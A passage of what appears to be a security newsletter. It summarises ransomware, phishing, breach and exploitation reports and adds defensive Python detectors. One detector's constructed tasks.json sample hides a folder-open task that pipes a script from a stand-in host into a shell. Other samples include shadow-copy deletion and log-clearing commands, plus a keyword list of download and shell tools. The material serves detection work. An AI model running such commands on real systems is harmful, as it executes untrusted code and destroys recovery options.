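# Fragments a recruiter "coding test" has no business running on folder open.
SUSPICIOUS = ("curl", "wget", "powershell", "invoke-webrequest", "| sh", "| bash",
              "base64", "node -e", "python -c")

def parse_tasks_json(text: str) -> list[dict]:
    """Return the task objects from tasks.json text, tolerating comments and trailing commas."""
    cleaned = _TRAILING_COMMA_RE.sub(r"\1", _COMMENT_RE.sub("", text))
    return json.loads(cleaned).get("tasks", [])

def find_autorun_tasks(text: str) -> list[dict]:
    """Return one finding per task configured to run automatically on folder open."""
    findings = []
    for task in parse_tasks_json(text):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        command = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": command,
            "indicators": [s for s in SUSPICIOUS if s in command.lower()],
        })
    return findings

def audit_repo(repo: Path) -> list[dict]:
    """Audit a checked-out repository; an empty list means no auto-run tasks were declared."""
    path = repo / ".vscode" / "tasks.json"
    return find_autorun_tasks(path.read_text(encoding="utf-8")) if path.exists() else []

# Constructed sample resembling a booby-trapped interview repo (not a real artifact).
SAMPLE_TASKS_JSON = """{
  // "setup" task that fetches a remote script and pipes it to a shell on folder open
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm", "args": ["run", "build"]},
    {"label": "setup env", "type": "shell", "command": "curl -fsSL https://example.invalid/setup.sh | sh",
     "runOptions": {"runOn": "folderOpen"}, "presentation": {"reveal": "never"}},
  ]
}"""

if __name__ == "__main__":
    for f in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(f"AUTO-RUN task {f['label']!r}: {f['command']} indicators={f['indicators']}")
```

Run it against the clone before opening the folder; a clean result does not replace the isolated VM and Workspace Trust controls above, since tasks are only one of several auto-execution paths.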

Kyber Ransomware “Goes Post-Quantum” on Windows While Hitting ESXi Environments

Rapid7 observed Kyber, a relatively new ransomware operation, deploying two encryptors in a single incident, one for VMware ESXi and one for Windows, to increase impact by encrypting both server types.

Key Takeaways

Targeting: Kyber hits Windows file servers and VMware ESXi in the same campaign.

Two variants: ESXi-focused Linux encryptor + Windows encryptor (Rust) deployed together.

“Post-quantum” angle (Windows variant): uses Kyber1024 + X25519 to protect key material; AES-CTR does bulk file encryption.

ESXi variant: “Post-quantum” claim appears false; uses ChaCha8 + RSA-4096 instead.

Operational impact: Doesn’t meaningfully change victim outcomes—encryption is still effective without attacker keys.

Anti-recovery behavior (Windows): Terminates services, deletes backups/shadow copies, clears logs, etc.; also mentions experimental Hyper-V targeting.

Defender focus: Prioritize ESXi hardening, backup immutability/offline backups, and monitoring for common pre-encryption behaviors (service stops, shadow copy deletion, mass file renames/extensions).

Kyber ransomware gang toys with post-quantum encryption on Windows
A new Kyber ransomware operation is targeting Windows systems and VMware ESXi endpoints in recent attacks, with one variant implementing Kyber1024 post-quantum encryption.
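
The pre-encryption behaviors listed in the defender focus above are visible in process-creation telemetry long before files get renamed. As an added example (not Rapid7's code), the following correlates service stops, shadow copy deletion, backup catalog wipes and log clearing per host, alerting only when several distinct behaviors land inside a short window; the event shape and sample events are constructed.

```python
"""Flag pre-encryption behaviour from process-creation events (service stops, shadow copy
deletion, backup catalog wipes, log clearing). Added example for this item, not Rapid7's code;
the event shape ({"ts", "host", "cmdline"}, like a Sysmon/EDR record) and samples are constructed."""
import re
from collections import defaultdict

# Rule name -> regex applied to the lower-cased command line.
RULES = {
    "shadow_copy_deletion": re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"),
    "backup_catalog_wipe": re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog|bcdedit(\.exe)?\s.*recoveryenabled\s+no"),
    "service_stop": re.compile(r"\b(sc(\.exe)?\s+stop|net(\.exe)?\s+stop|stop-service)\s+"),
    "log_clearing": re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\s+"),
}

def match_event(cmdline: str) -> list[str]:
    """Names of every rule the command line trips (empty list for benign commands)."""
    cl = cmdline.lower()
    return [name for name, rx in RULES.items() if rx.search(cl)]

def score_hosts(events, window_s=600, min_distinct=2) -> dict[str, list[str]]:
    """Return {host: behaviours} for hosts showing >= min_distinct distinct behaviours
    within window_s seconds. A lone service stop is routine admin work; several
    anti-recovery steps in quick succession are the pre-encryption pattern."""
    by_host = defaultdict(list)
    for ev in events:
        for name in match_event(ev["cmdline"]):
            by_host[ev["host"]].append((ev["ts"], name))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            names = {n for t, n in hits[i:] if t - t0 <= window_s}
            if len(names) >= min_distinct:
                alerts[host] = sorted(names)
                break
    return alerts

# Constructed sample: one file server wiped recovery options within five minutes,
# one workstation merely restarted the print spooler.
SAMPLE_EVENTS = [
    {"ts": 1000, "host": "fs01", "cmdline": "sc.exe stop MSSQLSERVER"},
    {"ts": 1040, "host": "fs01", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": 1100, "host": "fs01", "cmdline": "wevtutil.exe cl Security"},
    {"ts": 1200, "host": "ws02", "cmdline": "net stop Spooler"},
]

if __name__ == "__main__":
    for host, behaviours in score_hosts(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(behaviours)}")
```

The mass-rename signal from the same takeaway needs file-system events rather than process events, so it is left out here; it belongs in a second rule fed from the same per-host window.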

Apple Patches iOS Bug Used by FBI to Recover Deleted Signal Message Notifications

Apple released iOS/iPadOS 26.4.2 to fix a bug where notifications marked for deletion could be unexpectedly retained on the device.

Key Takeaways

What was fixed: iOS Notifications bug where “deleted” notifications could still remain on-device.

How it was used: FBI reportedly recovered incoming Signal message preview content from the notification database.

Scope/limits: This exposed notification previews (name/partial content if previews were enabled), not full Signal message history—and primarily received messages.

Who was most at risk: People with Signal (or other apps) set to show message previews on the lock screen/notifications.

What to do: Update to iOS/iPadOS 26.4.2; for extra privacy, set Signal notifications to no previews (or no name/no content) and consider tightening lock-screen notification visibility.

Apple just fixed an iOS flaw exploited by the FBI - here’s what happened
The latest iOS 26.4.2 update resolves a vulnerability that allowed the FBI to retrieve deleted text messages from a user’s Signal app.

UNC6692 Impersonates IT Helpdesk in Microsoft Teams to Deploy SNOW Malware

UNC6692 is a threat cluster documented by Mandiant that uses Microsoft Teams-based helpdesk impersonation to socially engineer victims and deploy a custom malware toolkit (the “SNOW” family).

Key Takeaways

Initial social engineering: Email bombing → attacker “helpdesk” reaches out in cross-tenant Microsoft Teams offering help.

Delivery method: Victim is sent a Teams phishing link (“Mailbox Repair and Sync Utility”) that downloads an AutoHotkey script from AWS S3.

Key payloads: Modular “SNOW” toolkit:

  • SNOWBELT = malicious Chromium/Edge extension (JS backdoor)
  • SNOWBASIN = persistent backdoor (cmd/PowerShell exec, file ops, screenshots)
  • SNOWGLAZE = tunneler (WebSocket tunnel to attacker C2)

Credential theft: The “Health Check” flow prompts for mailbox creds and exfiltrates them to S3.

Post-exploitation: Internal scanning + lateral movement (ports 135/445/3389), LSASS dumping, pass-the-hash to DCs, AD data collection, and exfiltration.

Defender focus: Treat Teams external chats as untrusted, enforce helpdesk verification workflows, restrict external Teams/screen-sharing, and monitor for Edge extension sideloading, AutoHotkey execution, and unusual S3 traffic/exfiltration patterns.

How UNC6692 Employed Social Engineering to Deploy a Custom Malware Suite | Google Cloud Blog
UNC6692 uses social engineering via email spamming and Microsoft Teams phishing to deploy a modular malware suite.

Trigona Ransomware Deploys Custom Exfiltration Tool to Steal Data Faster and Stay Stealthy

Trigona ransomware operators have been observed using a custom-built data exfiltration tool (“uploader_client.exe”) during recent intrusions to steal files faster and more quietly than with common tools like Rclone or MegaSync. Researchers assess this as an attempt to lower detection during the “data theft” phase of double-extortion, while the rest of the intrusion still includes aggressive steps to disable defenses, maintain access, and harvest credentials before encryption/extortion.

Key Takeaways

Why it matters: Custom tooling can evade detections tuned for known utilities (Rclone/MegaSync) and reduce defender visibility.

Exfil capabilities (notable):

  • Parallel uploads (up to 5 simultaneous connections per file) for speed
  • TCP rotation after ~2GB to evade monitoring thresholds
  • Selective targeting (skip large low-value media)
  • Auth key to restrict outsider access to stolen data

Observed targeting: High-value docs like invoices and PDFs on network drives.

Broader tradecraft: Includes defense evasion/kill tools and credential theft (e.g., AnyDesk for remote access; Mimikatz/NirSoft; vulnerable driver abuse to terminate security tooling).

Trigona ransomware attacks use custom exfiltration tool to steal data
Recently observed Trigona ransomware attacks are using a custom, command-line tool to steal data from compromised environments faster and more efficiently.
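
The two evasion features listed above, rotating the TCP connection around the 2 GB mark and uploading over several connections at once, are exactly what a per-connection byte threshold misses. As an added example (not the researchers' detection logic), the following aggregates flow records per source, destination and port inside a sliding window and alerts on either pattern; the record shape and sample flows are constructed.

```python
"""Aggregate egress per (src, dst, port) so rotating TCP connections and parallel uploads
do not slip under a per-connection volume threshold. Added example for this item, not the
researchers' detection; flow records (like NetFlow/firewall logs) and thresholds are constructed."""
from collections import defaultdict

GB = 1024 ** 3
MiB = 1024 ** 2

def detect_exfil(flows, total_threshold=4 * GB, window_s=3600, parallel_min=5):
    """One alert per (src, dst, dport) showing either pattern: many sub-threshold connections
    adding up past the threshold inside the window (rotation), or >= parallel_min open at once."""
    groups = defaultdict(list)
    for f in flows:
        groups[(f["src"], f["dst"], f["dport"])].append(f)
    alerts = []
    for key, fs in groups.items():
        fs.sort(key=lambda f: f["ts"])
        j = 0
        for i, cur in enumerate(fs):
            while cur["ts"] - fs[j]["ts"] > window_s:  # slide the window start forward
                j += 1
            win = fs[j:i + 1]
            total = sum(f["bytes_out"] for f in win)
            biggest = max(f["bytes_out"] for f in win)
            # Connections still open at the moment the current one starts.
            concurrent = sum(1 for f in win if f["ts"] <= cur["ts"] < f["ts"] + f["dur_s"])
            reasons = []
            if total >= total_threshold and biggest < total_threshold:
                reasons.append(f"rotation: {len(win)} flows totalling {total / GB:.1f} GB, "
                               f"largest single flow {biggest / GB:.1f} GB")
            if concurrent >= parallel_min:
                reasons.append(f"parallel: {concurrent} concurrent connections")
            if reasons:
                alerts.append({"key": key, "reasons": reasons})
                break
    return alerts

def _flow(ts, dur_s, src, dst, dport, bytes_out):
    return {"ts": ts, "dur_s": dur_s, "src": src, "dst": dst, "dport": dport, "bytes_out": bytes_out}

# Constructed sample: rotation to one host, five parallel uploads to another, and one
# legitimate 6 GB backup transfer that a per-connection rule would already see.
SAMPLE_FLOWS = (
    [_flow(700 * i, 650, "10.0.5.21", "203.0.113.40", 443, 1900 * MiB) for i in range(5)]
    + [_flow(5000, 600, "10.0.5.21", "198.51.100.7", 443, 300 * MiB) for _ in range(5)]
    + [_flow(100, 3000, "10.0.9.8", "192.0.2.10", 22, 6 * GB)]
)

if __name__ == "__main__":
    for a in detect_exfil(SAMPLE_FLOWS):
        print(a["key"], "->", "; ".join(a["reasons"]))
```

The parallel rule on its own fires on ordinary browsers, which open several connections to one host, so in production gate it on bytes transferred as well.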

ADT Data Breach: ShinyHunters Alleges Okta Vishing Led to Salesforce Data Theft

ADT confirmed a data breach after the threat group ShinyHunters claimed it stole 10M+ records and issued a “pay or leak” ultimatum.

Key Takeaways

What happened: ADT confirmed unauthorized access to cloud systems after ShinyHunters publicly claimed the breach.

Where data was taken from: Salesforce customer/prospect records.

What data may be exposed: Mainly names, phone numbers, and home addresses; in some cases DOB and last 4 of SSN/Tax ID.

What was not accessed (per ADT): No bank/credit card info, and home security systems remained operational/secure.

Response actions: Access was terminated, IR plan activated, external forensics engaged, law enforcement notified, and impacted individuals notified.

Why it matters: This is another example of identity provider/SSO compromise leading to downstream SaaS data theft—strong reminder to harden against social-engineering-based account takeover (Okta, helpdesk processes, MFA, etc.).

ADT Confirms Data Breach Following ShinyHunters Data Leak Claim
Home security giant ADT Inc. has confirmed a data breach after the notorious threat group ShinyHunters claimed to have stolen over 10 million records and issued a ransom ultimatum — “Pay or Leak.”

Cisco Firepower Under Active Exploitation: CVE-2025-20333 & CVE-2025-20362 Used in the Wild

Cisco Talos reports state-sponsored threat actors (UAT-4356) are actively targeting Cisco Firepower perimeter devices by chaining two known (“n-day”) vulnerabilities—CVE-2025-20333 and CVE-2025-20362—to gain access to FXOS environments.

Key Takeaways

Who: UAT-4356 (espionage-focused, state-sponsored activity per Talos).

What: Real-world exploitation of Cisco Firepower/FXOS devices.

How: Chaining two n-day CVEs (CVE-2025-20333, CVE-2025-20362) to get in, then deploying FIRESTARTER.

Why it matters: This is perimeter infrastructure compromise → persistent access → network-wide risk and potential intelligence collection.

Defender actions:

  • Patch/upgrade immediately per Cisco guidance and CISA Emergency Directive 25-03.
  • Hunt for FIRESTARTER artifacts (unexpected processes / suspicious temp log/core files).
  • If compromised, reimage affected devices (Talos guidance suggests this is the cleanest way to remove the implant).
  • Add network detection using Snort rules 65340 & 46897 (exploit activity) and 62949 (backdoor behavior).

Hackers Exploiting Cisco Firepower Devices Using n-day Vulnerabilities to Gain Unauthorized Access
UAT-4356 exploits Cisco Firepower vulnerabilities to deploy the FIRESTARTER backdoor for persistent network access.
